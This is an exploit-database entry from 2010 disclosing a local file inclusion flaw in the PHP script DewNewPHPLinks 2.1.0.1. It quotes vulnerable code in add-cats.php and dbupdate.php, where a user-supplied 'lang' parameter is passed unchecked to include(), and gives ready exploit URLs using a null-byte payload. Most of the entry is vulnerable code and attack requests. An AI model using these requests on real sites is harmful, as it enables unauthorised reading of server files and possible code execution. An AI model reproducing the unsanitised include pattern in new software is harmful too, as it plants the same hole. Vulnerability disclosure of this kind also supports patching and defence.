DewNewPHPLinks 2.1.0.1 - Local File Inclusion
Author: ITSecTeam
type: webapps
platform: php
port:
date_added: 2010-03-17
date_updated: 2010-11-12
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comdew-newphplinks.v.2.1.0.1b.sef.zip
#########################local file include#################
Author: ItSecTeam
download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip
script:DewNewPHPLinks 2.1.0.1
*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
--------------------------------------------
xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################
discovered by ahmadbady
########################